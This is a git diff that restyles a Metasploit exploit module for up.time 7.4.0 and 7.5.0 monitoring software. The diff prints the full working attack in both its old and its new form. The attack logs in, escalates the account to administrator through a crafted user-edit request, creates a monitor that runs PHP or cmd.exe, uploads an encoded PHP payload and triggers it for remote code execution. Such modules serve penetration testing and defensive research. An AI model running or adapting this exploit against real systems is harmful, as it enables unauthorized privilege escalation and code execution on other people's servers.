diff --git a/modules/exploits/multi/http/uptime_code_exec.rb b/modules/exploits/multi/http/uptime_code_exec.rb
index 5509991a9f..0dd157a310 100644
--- a/modules/exploits/multi/http/uptime_code_exec.rb
+++ b/modules/exploits/multi/http/uptime_code_exec.rb
@@ -4,510 +4,478 @@ ## require 'msf/core' - class Metasploit4 < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::PhpEXE - - - def initialize(info={}) - super(update_info(info, - 'Name' => "Uptime Version 7.4.0 / 7.5.0 Upload and Exec file", - 'Description' => %q{ - This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0 By - supplying a specially crafted request is possible to upload file and execute arbitrary - commands through privilege escalation. - - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Ewerson Guimaraes(Crash) ', - 'Gjoko Krstic(LiquidWorm) ', - ], - 'References' => - [ - ['CVE', ''], - ['OSVDB', ''], - ['US-CERT-VU', ''] - ], - 'Payload' => - { - 'Space' => 100000, # just a big enough number to fit any PHP payload - 'DisableNops' => true - }, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultOptions' => - { - 'SSL' => false - }, - 'Privileged' => 'True', - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Aug 6 2015' - )) - - register_options( - [ - Opt::RPORT(9999), - OptString.new("USERNAME", [true, 'The username to authenticate as']), - OptString.new("PASSWORD", [true, 'The password to authenticate with']), - ], self.class) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Uptime Version 7.4.0 / 7.5.0 Upload and Exec file', + 'Description' => ' + This module exploits a vulnerability found in Uptime + version 7.4.0 and 7.5.0 By supplying a specially + crafted request is possible to upload file and execute + arbitrary commands through privilege escalation. 
+ ', + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ewerson Guimaraes(Crash) ', + 'Gjoko Krstic(LiquidWorm) ' + ], + 'References' => + [ + ['CVE', ''], + ['OSVDB', ''], + ['US-CERT-VU', ''] + ], + 'Payload' => + { + 'Space' => 100_000, + 'DisableNops' => true + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Automatic', {}] + ], + 'DefaultOptions' => + { + 'SSL' => false + }, + 'Privileged' => 'True', + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 6 2015' + )) + register_options( + [ + Opt::RPORT(9999), + OptString.new('USERNAME', [true, 'The username to authenticate as']), + OptString.new('PASSWORD', [true, 'The password to authenticate with']) + ], self.class) end -################################Application Check############################## - def check - sig = "up.time 7.5.0" - sig2 = "up.time 7.4.0" + # ###############################Application Check############################## + def check + sig = 'up.time 7.5.0' + sig2 = 'up.time 7.4.0' - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/' + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/') - } ) + print_status("#{rhost}:#{rport} - Checking version...") - print_status("#{rhost}:#{rport} - Checking version...") + if res.code == 200 && res.body =~ /#{sig}/ || res.code == 200 && res.body =~ /#{sig2}/ + return Exploit::CheckCode::Appears + end + Exploit::CheckCode::Safe + end - if res.code == 200 && res.body =~ /#{sig}/ || res.code == 200 && res.body =~ /#{sig2}/ - return Exploit::CheckCode::Appears - end - return Exploit::CheckCode::Safe - end + def exploit + print_status('Trying to login...') + # ############################Application Login########################### + res_auth = send_request_cgi( + 'method' => 'POST', + 'uri' => '/index.php?', + 'vars_post' => { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }) - - def exploit - print_status("Trying to login...") -#############################Application 
Login########################### - res_auth = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/index.php?', - 'vars_post' => { - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - - } - } ) - -#############################Check OS ##################################### + # ############################Check OS ##################################### if res_auth.headers['Server'] =~ /Unix/ - print_status("Found Linux instalation - Setting appropriated PATH") - phppath = "/usr/local/uptime/apache/bin/php" - uploadpath = "/usr/local/uptime/GUI/wizards" + print_status('Found Linux instalation - Setting appropriated PATH') + phppath = '/usr/local/uptime/apache/bin/php' + uploadpath = '/usr/local/uptime/GUI/wizards' else - print_status("Found Windows instalation - Setting appropriated PATH") - phppath = "C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe" - uploadpath = "C:\\Program Files\\uptime software\\uptime\\GUI\\wizards" - + print_status('Found Windows instalation - Setting appropriated PATH') + phppath = 'C:\\Program Files\\uptime software\\uptime\\apache\\php\\php.exe' + uploadpath = 'C:\\Program Files\\uptime software\\uptime\\GUI\\wizards' end -########################################################################### + ########################################################################### + if res_auth && res_auth.get_cookies =~ /login=true/ + cookie = Regexp.last_match(1) + cookie_split = res_auth.get_cookies.split(';') + print_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") + print_good('Login success') - if res_auth and res_auth.get_cookies =~ /login=true/ - cookie = $1 - cookie_split = res_auth.get_cookies.split(";") - print_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") - print_good("Login success") + # #####################Privilege escalation getting user ID################# + res_priv = send_request_cgi( + 'method' => 'GET', + 'uri' => '/main.php', + 'vars_get' => + { + 
'page' => 'Users', + 'subPage' => 'UserContainer' + }, + 'headers' => + { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }) + matchdata = res_priv.body.match(/UPTIME.CurrentUser.userId.*/) + get_id = matchdata[0].gsub(/[^\d]/, '') + print_status('Escalating privileges...') + # #####################Privilege escalation post#################################### + res_priv_elev = send_request_cgi( + 'method' => 'POST', + 'uri' => '/main.php', + 'vars_get' => + { + 'section' => 'UserContainer', + 'subsection' => 'edit', + 'id' => "#{get_id}" + }, + 'headers' => + { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }, + 'vars_post' => + { + 'operation' => 'submit', + 'disableEditOfUsernameRoleGroup' => 'false', + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'passwordConfirm' => datastore['PASSWORD'], + 'firstname' => rand_text_alpha(10), + 'lastname' => rand_text_alpha(10), + 'location' => '', + 'emailaddress' => '', + 'emailtimeperiodid' => '1', + 'phonenumber' => '', + 'phonenumbertimeperiodid' => '1', + 'windowshost' => '', + 'windowsworkgroup' => '', + 'windowspopuptimeperiodid' => '1', + 'landingpage' => 'MyPortal', + 'isonvacation' => '0', + 'receivealerts' => '0', + 'activexgraphs' => '0', + 'newuser' => 'on', + 'newuser' => '1', + 'userroleid' => '1', + 
'usergroupid[]' => '1' + }) + # #################################Refresing perms.################################################################### + print_status('Refresing perms...') + res_priv = send_request_cgi( + 'method' => 'GET', + 'uri' => '/index.php?loggedout', + 'headers' => + { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + } + ) -######################Privilege escalation getting user ID################# - res_priv = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/main.php', - 'vars_get' => { - 'page' => 'Users', - 'subPage' => 'UserContainer' - }, - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', - } + res_auth = send_request_cgi( + 'method' => 'POST', + 'uri' => '/index.php', + 'vars_post' => + { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] - } - ) - matchdata=res_priv.body.match(/UPTIME.CurrentUser.userId.*/) + }) + if res_auth && res_auth.get_cookies =~ /login=true/ + cookie = Regexp.last_match(1) + cookie_split = res_auth.get_cookies.split(';') + print_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") + print_good('Priv. 
Escalation success') + end - get_id= matchdata[0].gsub(/[^\d]/, '') + # #########CREATING EXEC Service################################################# + phpfile_name = rand_text_alpha(10) + # #########CREATING Linux EXEC Service################################################# + if res_auth.headers['Server'] =~ /Unix/ + print_status('Creating Linux Monitor Code exec...') + res_service = send_request_cgi( + 'method' => 'POST', + 'uri' => '/main.php', + 'headers' => + { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }, + 'vars_get' => + { + 'section' => 'ERDCInstance', + 'subsection' => 'add' + }, + 'vars_post' => + { + 'initialERDCId' => '20', + 'target' => '1', + 'targetType' => 'systemList', + 'systemList' => '1', + 'serviceGroupList' => '-10', + 'initialMode' => 'standard', + 'erdcName' => 'Exploit', + 'erdcInitialName' => '', + 'erdcDescription' => 'Exploit', + 'hostButton' => 'system', + 'erdc_id' => '20', + 'forceReload' => '0', + 'operation' => 'standard', + 'erdc_instance_id' => '', + 'label_[184]' => 'Script Name', + 'value_[184]' => phppath, + 'id_[184]' => 'process', + 'name_[process]' => '184', + 'units_[184]' => '', + 'guiBasic_[184]' => '1', + 'inputType_[184]' => 'GUIString', + 'screenOrder_[184]' => '1', + 'parmType_[184]' => '1', + 'label_[185]' => 'Arguments', + 'value_[185]' => uploadpath + '/' + phpfile_name + '.txt', + 'id_[185]' => 'args', + 'name_[args]' => '185', + 'units_[185]' => '', + 'guiBasic_[185]' => '1', + 'inputType_[185]' => 'GUIString', + 'screenOrder_[185]' => '2', + 'parmType_[185]' => '1', + 'label_[187]' => 'Output', + 'can_retain_[187]' => 'false', + 'comparisonWarn_[187]' => '-1', + 'comparison_[187]' => '-1', + 
'id_[187]' => 'value_critical_output', + 'name_[output]' => '187', + 'units_[187]' => '', + 'guiBasic_[187]' => '1', + 'inputType_[187]' => 'GUIString', + 'screenOrder_[187]' => '4', + 'parmType_[187]' => '2', + 'label_[189]' => 'Response time', + 'can_retain_[189]' => 'false', + 'comparisonWarn_[189]' => '-1', + 'comparison_[189]' => '-1', + 'id_[189]' => 'value_critical_timer', + 'name_[timer]' => '189', + 'units_[189]' => 'ms', + 'guiBasic_[189]' => '0', + 'inputType_[189]' => 'GUIInteger', + 'screenOrder_[189]' => '6', + 'parmType_[189]' => '2', + 'timing_[erdc_instance_monitored]' => '1', + 'timing_[timeout]' => '60', + 'timing_[check_interval]' => '10', + 'timing_[recheck_interval]' => '1', + 'timing_[max_rechecks]' => '3', + 'alerting_[notification]' => '1', + 'alerting_[alert_interval]' => '120', + 'alerting_[alert_on_critical]' => '1', + 'alerting_[alert_on_warning]' => '1', + 'alerting_[alert_on_recovery]' => '1', + 'alerting_[alert_on_unknown]' => '1', + 'time_period_id' => '1', + 'pageFinish' => 'Finish', + 'pageContinue' => 'Continue...', + 'isWizard' => '1', + 'wizardPage' => '2', + 'wizardNumPages' => '2', + 'wizardTask' => 'pageFinish', + 'visitedPage[1]' => '1', + 'visitedPage[2]' => '1' + }) - print_status("Escalating privileges...") - -######################Privilege escalation post#################################### - res_priv_elev = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/main.php', - 'vars_get' => { - 'section' => 'UserContainer', - 'subsection' => 'edit', - 'id' => "#{get_id}" - }, - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/main.php?page=Users&subPage=UserContainer", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', - }, - 'vars_post' => { - 'operation' =>'submit', 
- 'disableEditOfUsernameRoleGroup' =>'false', - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'], - 'passwordConfirm' => datastore['PASSWORD'], - 'firstname' => rand_text_alpha(10), - 'lastname' => rand_text_alpha(10), - 'location' =>'', - 'emailaddress' =>'', - 'emailtimeperiodid' =>'1', - 'phonenumber' =>'', - 'phonenumbertimeperiodid' =>'1', - 'windowshost' =>'', - 'windowsworkgroup' =>'', - 'windowspopuptimeperiodid' =>'1', - 'landingpage' =>'MyPortal', - 'isonvacation' =>'0', - 'receivealerts' =>'0', - 'activexgraphs' =>'0', - 'newuser' =>'on', - 'newuser' =>'1', - 'userroleid' =>'1', - 'usergroupid[]' =>'1' - } - } ) - -##################################Refresing perms.################################################################### - print_status("Refresing perms...") - res_priv = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/index.php?loggedout', - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - } - - } ) - - res_auth = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/index.php', - 'vars_post' => { - 'username' => datastore['USERNAME'], - 'password' => datastore['PASSWORD'] - - } - } ) - - if res_auth and res_auth.get_cookies =~ /login=true/ - cookie = $1 - cookie_split = res_auth.get_cookies.split(";") - print_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}") - print_good("Priv. 
Escalation success") - end - -##########CREATING EXEC Service################################################# -phpfile_name = rand_text_alpha(10) -##########CREATING Linux EXEC Service################################################# - if res_auth.headers['Server'] =~ /Unix/ - print_status("Creating Linux Monitor Code exec...") - res_service = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/main.php', - 'headers' =>{ - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - }, - 'vars_get' => { - 'section' => 'ERDCInstance', - 'subsection' => 'add' - - }, - 'vars_post' => { - 'initialERDCId' => '20', - 'target' => '1', - 'targetType' => 'systemList', - 'systemList' => '1', - 'serviceGroupList' => '-10', - 'initialMode' => 'standard', - 'erdcName' => 'Exploit', - 'erdcInitialName' => '', - 'erdcDescription' => 'Exploit', - 'hostButton' => 'system', - 'erdc_id' => '20', - 'forceReload' => '0', - 'operation' => 'standard', - 'erdc_instance_id' => '', - 'label_[184]' => 'Script Name', - 'value_[184]' => phppath, - 'id_[184]' => 'process', - 'name_[process]' => '184', - 'units_[184]' => '', - 'guiBasic_[184]' => '1', - 'inputType_[184]' => 'GUIString', - 'screenOrder_[184]' => '1', - 'parmType_[184]' => '1', - 'label_[185]' => 'Arguments', - 'value_[185]' => uploadpath +'/'+ phpfile_name +'.txt', - 'id_[185]' => 'args', - 'name_[args]' => '185', - 'units_[185]' => '', - 'guiBasic_[185]' => '1', - 'inputType_[185]' => 'GUIString', - 'screenOrder_[185]' => '2', - 'parmType_[185]' => '1', - 'label_[187]' => 'Output', - 'can_retain_[187]' => 'false', - 'comparisonWarn_[187]' => '-1', - 'comparison_[187]' => '-1', - 'id_[187]' => 'value_critical_output', - 'name_[output]' => 
'187', - 'units_[187]' => '', - 'guiBasic_[187]' => '1', - 'inputType_[187]' => 'GUIString', - 'screenOrder_[187]' => '4', - 'parmType_[187]' => '2', - 'label_[189]' => 'Response time', - 'can_retain_[189]' => 'false', - 'comparisonWarn_[189]' => '-1', - 'comparison_[189]' => '-1', - 'id_[189]' => 'value_critical_timer', - 'name_[timer]' => '189', - 'units_[189]' => 'ms', - 'guiBasic_[189]' => '0', - 'inputType_[189]' => 'GUIInteger', - 'screenOrder_[189]' => '6', - 'parmType_[189]' => '2', - 'timing_[erdc_instance_monitored]' => '1', - 'timing_[timeout]' => '60', - 'timing_[check_interval]' => '10', - 'timing_[recheck_interval]' => '1', - 'timing_[max_rechecks]' => '3', - 'alerting_[notification]' => '1', - 'alerting_[alert_interval]' => '120', - 'alerting_[alert_on_critical]' => '1', - 'alerting_[alert_on_warning]' => '1', - 'alerting_[alert_on_recovery]' => '1', - 'alerting_[alert_on_unknown]' => '1', - 'time_period_id' => '1', - 'pageFinish' => 'Finish', - 'pageContinue' => 'Continue...', - 'isWizard' => '1', - 'wizardPage' => '2', - 'wizardNumPages' => '2', - 'wizardTask' => 'pageFinish', - 'visitedPage[1]' => '1', - 'visitedPage[2]' => '1' - - } - } ) - - else -##########CREATING Windows EXEC Service################################################# - print_status("Creating Windows Monitor Code exec...") - res_service = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/main.php', - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - }, - 'vars_get' => { - 'section' => 'ERDCInstance', - 'subsection' => 'add' - }, - 'vars_post' => { - 'initialERDCId' => '20', - 'target' => '1', - 'targetType' => 'systemList', - 'systemList' => '1', - 
'serviceGroupList' => '-10', - 'initialMode' => 'standard', - 'erdcName' => 'Exploit', - 'erdcInitialName' => '', - 'erdcDescription' => 'Exploit', - 'hostButton' => 'system', - 'erdc_id' => '20', - 'forceReload' => '0', - 'operation' => 'standard', - 'erdc_instance_id' => '', - 'label_[184]' => 'Script Name', - 'value_[184]' => 'c:\windows\system32\cmd.exe', - 'id_[184]' => 'process', - 'name_[process]' => '184', - 'units_[184]' => '', - 'guiBasic_[184]' => '1', - 'inputType_[184]' => 'GUIString', - 'screenOrder_[184]' => '1', - 'parmType_[184]' => '1', - 'label_[185]' => 'Arguments', - 'value_[185]' => "/K \"\"#{phppath}\""+" "+"\"#{uploadpath}\\#{phpfile_name}.txt""\"\" ", - 'id_[185]' => 'args', - 'name_[args]' => '185', - 'units_[185]' => '', - 'guiBasic_[185]' => '1', - 'inputType_[185]' => 'GUIString', - 'screenOrder_[185]' => '2', - 'parmType_[185]' => '1', - 'label_[187]' => 'Output', - 'can_retain_[187]' => 'false', - 'comparisonWarn_[187]' => '-1', - 'comparison_[187]' => '-1', - 'id_[187]' => 'value_critical_output', - 'name_[output]' => '187', - 'units_[187]' => '', - 'guiBasic_[187]' => '1', - 'inputType_[187]' => 'GUIString', - 'screenOrder_[187]' => '4', - 'parmType_[187]' => '2', - 'label_[189]' => 'Response time', - 'can_retain_[189]' => 'false', - 'comparisonWarn_[189]' => '-1', - 'comparison_[189]' => '-1', - 'id_[189]' => 'value_critical_timer', - 'name_[timer]' => '189', - 'units_[189]' => 'ms', - 'guiBasic_[189]' => '0', - 'inputType_[189]' => 'GUIInteger', - 'screenOrder_[189]' => '6', - 'parmType_[189]' => '2', - 'timing_[erdc_instance_monitored]' => '1', - 'timing_[timeout]' => '60', - 'timing_[check_interval]' => '10', - 'timing_[recheck_interval]' => '1', - 'timing_[max_rechecks]' => '3', - 'alerting_[notification]' => '1', - 'alerting_[alert_interval]' => '120', - 'alerting_[alert_on_critical]' => '1', - 'alerting_[alert_on_warning]' => '1', - 'alerting_[alert_on_recovery]' => '1', - 'alerting_[alert_on_unknown]' => '1', - 
'time_period_id' => '1', - 'pageFinish' => 'Finish', - 'pageContinue' => 'Continue...', - 'isWizard' => '1', - 'wizardPage' => '2', - 'wizardNumPages' => '2', - 'wizardTask' => 'pageFinish', - 'visitedPage[1]' => '1', - 'visitedPage[2]' => '1' - } - } ) - end - - -########Upload file############################################### - print_status("Uploading file...") - res_upload = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/wizards/post2file.php', - 'vars_post' => { - 'file_name' => phpfile_name + '.txt', - 'script' => payload.encoded - - } - } ) - - print_status("Cheking Uploaded file...") - res_up_check = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/wizards'+ '/' + phpfile_name + '.txt', - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - } - - } ) - - if res_up_check.code == 200 - print_good("File found: #{phpfile_name}") - else - print_error("File not found") - end - - -#####Get Monitor ID################################################################## - - print_status("Fetching Monitor ID...") - res_mon_id = send_request_cgi({ - 'method' => 'GET', - 'uri' => '/ajax/jsonQuery.php', - 'vars_get' => { - 'query' => 'GET_SERVICE_PAGE_ERDC_LIST', - 'iDisplayStart' => '0', - 'iDisplayLength' => '10', - 'sSearch' => 'Exploit' - }, - 'headers' => { - 'Accept' =>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', + else + # #########CREATING Windows EXEC Service################################################# + print_status('Creating Windows Monitor Code exec...') + res_service = send_request_cgi('method' => 'POST', + 'uri' => '/main.php', + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 
'Cache-Control' => 'max-age=0', 'Connection' => 'keep-alive', 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", 'Host' => "#{rhost}", 'Referer' => "#{rhost}/index.php", 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - } + }, + 'vars_get' => { + 'section' => 'ERDCInstance', + 'subsection' => 'add' + }, + 'vars_post' => { + 'initialERDCId' => '20', + 'target' => '1', + 'targetType' => 'systemList', + 'systemList' => '1', + 'serviceGroupList' => '-10', + 'initialMode' => 'standard', + 'erdcName' => 'Exploit', + 'erdcInitialName' => '', + 'erdcDescription' => 'Exploit', + 'hostButton' => 'system', + 'erdc_id' => '20', + 'forceReload' => '0', + 'operation' => 'standard', + 'erdc_instance_id' => '', + 'label_[184]' => 'Script Name', + 'value_[184]' => 'c:\windows\system32\cmd.exe', + 'id_[184]' => 'process', + 'name_[process]' => '184', + 'units_[184]' => '', + 'guiBasic_[184]' => '1', + 'inputType_[184]' => 'GUIString', + 'screenOrder_[184]' => '1', + 'parmType_[184]' => '1', + 'label_[185]' => 'Arguments', + 'value_[185]' => "/K \"\"#{phppath}\"" + ' ' + "\"#{uploadpath}\\#{phpfile_name}.txt""\"\" ", + 'id_[185]' => 'args', + 'name_[args]' => '185', + 'units_[185]' => '', + 'guiBasic_[185]' => '1', + 'inputType_[185]' => 'GUIString', + 'screenOrder_[185]' => '2', + 'parmType_[185]' => '1', + 'label_[187]' => 'Output', + 'can_retain_[187]' => 'false', + 'comparisonWarn_[187]' => '-1', + 'comparison_[187]' => '-1', + 'id_[187]' => 'value_critical_output', + 'name_[output]' => '187', + 'units_[187]' => '', + 'guiBasic_[187]' => '1', + 'inputType_[187]' => 'GUIString', + 'screenOrder_[187]' => '4', + 'parmType_[187]' => '2', + 'label_[189]' => 'Response time', + 'can_retain_[189]' => 'false', + 'comparisonWarn_[189]' => '-1', + 'comparison_[189]' => '-1', + 'id_[189]' => 'value_critical_timer', + 'name_[timer]' => '189', + 'units_[189]' => 'ms', + 'guiBasic_[189]' => '0', + 'inputType_[189]' => 'GUIInteger', + 
'screenOrder_[189]' => '6', + 'parmType_[189]' => '2', + 'timing_[erdc_instance_monitored]' => '1', + 'timing_[timeout]' => '60', + 'timing_[check_interval]' => '10', + 'timing_[recheck_interval]' => '1', + 'timing_[max_rechecks]' => '3', + 'alerting_[notification]' => '1', + 'alerting_[alert_interval]' => '120', + 'alerting_[alert_on_critical]' => '1', + 'alerting_[alert_on_warning]' => '1', + 'alerting_[alert_on_recovery]' => '1', + 'alerting_[alert_on_unknown]' => '1', + 'time_period_id' => '1', + 'pageFinish' => 'Finish', + 'pageContinue' => 'Continue...', + 'isWizard' => '1', + 'wizardPage' => '2', + 'wizardNumPages' => '2', + 'wizardTask' => 'pageFinish', + 'visitedPage[1]' => '1', + 'visitedPage[2]' => '1' + }) + end + # #######Upload file############################################### + print_status('Uploading file...') + res_upload = send_request_cgi('method' => 'POST', + 'uri' => '/wizards/post2file.php', + 'vars_post' => { + 'file_name' => phpfile_name + '.txt', + 'script' => payload.encoded + }) - } ) + print_status('Cheking Uploaded file...') + res_up_check = send_request_cgi('method' => 'GET', + 'uri' => '/wizards' + '/' + phpfile_name + '.txt', + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }) - matchdata=res_mon_id.body.match(/id=?[^>]*>/) + if res_up_check.code == 200 + print_good("File found: #{phpfile_name}") + else + print_error('File not found') + end - mon_get_id= matchdata[0].gsub(/[^\d]/, '') - print_good("Monitor id aquired:#{mon_get_id}") -####Executing monitor#################################################################### - res_exec_mon = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/main.php', - 'headers' => { - 'Accept' 
=>'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Cache-Control'=> 'max-age=0', - 'Connection' => 'keep-alive', - 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", - 'Host' => "#{rhost}", - 'Referer' => "#{rhost}/index.php", - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' - }, - 'vars_post' => { - 'section' => 'RunERDCInstance', - 'subsection' => 'view', - 'id' => mon_get_id, - 'name' => 'Exploit' + # ####Get Monitor ID################################################################## - } - } ) -###################################################################################### + print_status('Fetching Monitor ID...') + res_mon_id = send_request_cgi('method' => 'GET', + 'uri' => '/ajax/jsonQuery.php', + 'vars_get' => { + 'query' => 'GET_SERVICE_PAGE_ERDC_LIST', + 'iDisplayStart' => '0', + 'iDisplayLength' => '10', + 'sSearch' => 'Exploit' + }, + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' + }) + + matchdata = res_mon_id.body.match(/id=?[^>]*>/) + + mon_get_id = matchdata[0].gsub(/[^\d]/, '') + print_good("Monitor id aquired:#{mon_get_id}") + # ###Executing monitor#################################################################### + res_exec_mon = send_request_cgi('method' => 'POST', + 'uri' => '/main.php', + 'headers' => { + 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Cache-Control' => 'max-age=0', + 'Connection' => 'keep-alive', + 'Cookie' => "#{cookie_split[1]}; #{cookie_split[2]}", + 'Host' => "#{rhost}", + 'Referer' => "#{rhost}/index.php", + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0' + }, + 'vars_post' => { + 'section' => 'RunERDCInstance', + 'subsection' => 'view', + 'id' => mon_get_id, + 'name' => 'Exploit' + + }) + ###################################################################################### else - print_error("#{rhost}:#{rport} - Cookie not found") - return nil + print_error("#{rhost}:#{rport} - Cookie not found") + return nil end - -end + end end
